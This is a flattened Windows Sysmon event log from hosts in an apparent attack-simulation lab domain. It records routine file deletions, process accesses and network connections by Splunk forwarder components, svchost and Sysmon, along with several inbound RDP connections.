23542300x8000000000000000977976Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:32.514{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=CEFED5759948CFB0EB0A3FC0114926F5,SHA256=DEA48F1DBBB198A05C4E86150D24ABBD0E9A7DF91FBF2D9AC203160E63C13B94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977980Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:33.749{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25E11058912342FB846E05685566D257,SHA256=AC9AA08AEF4672EC1EAEDAFE590C113DAD238284CF7EEED7A45E4E4B0E33DE21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049307Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:33.600{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4918FA5C1937B376E1EB786F8C826E41,SHA256=BD3FBA2D8A3E54B0AD4A5079735966BA937EE03767293F0BA9A494F3E0FFA885,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977982Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:34.889{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42B98EAE93C0DF7AEB1DC03C899931D6,SHA256=12C64EE8C8C58C72C2ED49A3424B970F2B4DFAFE0724C340294BD0DF1C16EA54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049308Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:34.667{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73DBB0318A8E75B8A4A9157FE42E377B,SHA256=340167D8DCE8D3A8A33375E8EFC12A4E9E5916BC7D82F9AC73172633A54D2179,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977981Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:34.170{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BB2B4692493C2FC292BEC3B69DA5C6B1,SHA256=50761F74459107D0EBCF5530CF404A42CB5DB5287787927ECFCADB9778B739A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977984Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:35.889{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFA2656BCEE753EE8869BC1B587E2EDC,SHA256=D0353FB5BC4DF0940DDC9F9F13FE9C1509929CDB4261B32AB4515A4F4F27902C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049312Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:35.686{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF6A7A0CDD11F4A00C7B7310DB594CEF,SHA256=F9D6EECE334858C59516E929532ED037CACF489B2DB4C4166CAC1B2409FECAEA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977983Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:31.468{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-49892-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001049311Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:33.891{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53297-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001049310Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:33.770{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-51136-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049309Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:35.386{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ECF475A0EC89BDCAB1AE74AF91AC9E7B,SHA256=F80DC3E34D5D8B33E7A91C072ADDAB79B9240FCAD19D1C3171082FD60B9FD125,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977985Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:36.905{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35268B6B62AB6FE91AA0D2A6CA7D1590,SHA256=48D3F3B574D9A260690BFC4AAC73F7E8897DAEF03F71E8342B0C8EC6233CCA72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049315Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:36.848{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7AA0C47D27FCAE4B97746C058A119E5F,SHA256=831D467F9462AA82D831AD59F32B32AC2CC938FB12965FFDFB88AAC7C5E08E78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049314Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:36.700{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A127B6582C6544DEBE5822E1A477E13,SHA256=94025E8F0E5D5239EB9E04DDC21DC205A95D9E80D021352B5B105ABF184A6ECA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049313Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:36.532{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049317Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:37.731{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB3EC74EBC7C15ED0E186AE4E5CCA550,SHA256=2AE883EEB6E12F3E01D75DCE82BD781C51C911B099407A5654394FD9591662F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978000Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:37.905{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=725211D35F77E8CFD136FA116A18A5F9,SHA256=CC5DF36EAEBF35D77E0C6AD066F4A446F925252BC6DF80E1EC790C91B93A3ADF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977999Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:37.592{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-89D9-6151-AA79-00000000FD01}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977998Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:37.592{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977997Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:37.592{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977996Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:37.592{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977995Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:37.592{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977994Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:37.592{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977993Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:37.592{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977992Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:37.592{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977991Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:37.592{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977990Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:37.592{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977989Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:37.592{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-89D9-6151-AA79-00000000FD01}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977988Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:37.592{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-89D9-6151-AA79-00000000FD01}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977987Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:37.578{69CF5F33-89D9-6151-AA79-00000000FD01}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977986Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:37.530{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8957EC761CFABE9D930DCEA55A03AB2,SHA256=20C4551250601A1C96314004AF1B77A0E19B9578F546B6621970FBBBBB250E27,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049316Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:34.415{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55469-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049319Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:38.764{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2088830FCF4BB5DBCF310371ABCF423,SHA256=80F8BCFAAE9CAF1826EF6D0520043D475E8EE3E706A4F448E4134497087B234D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978004Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:38.920{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=156EABBA966E663DC6B25C3C41D7A448,SHA256=D17A083D3B82D3ED546071416646DC5701FD694EDD9AE52410B2A4FBCA443480,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049318Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:36.208{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53298-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000978003Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:38.592{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=17270B4806518AB5125942E0EC39DB51,SHA256=003BD4C01AC3840727EF8A291CDB864C00442D5F6F10043FE9278F3C93CA6CB6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978002Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:34.674{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59331-false10.0.1.12-8000- 354300x8000000000000000978001Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:34.418{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56064-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978005Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:39.936{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C567AB17781FEA74D731D42031C1585,SHA256=35FF2C0B0038F769323691940CF688561C0287BB52AE4475461E1406F03839F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049321Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:39.829{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F77F8ECECB4C388CCE1548183695389,SHA256=3384C76E64411BE23B2A0EDDA15213A0CC41CEDC45980A24B50125AE0B7A2061,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049320Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 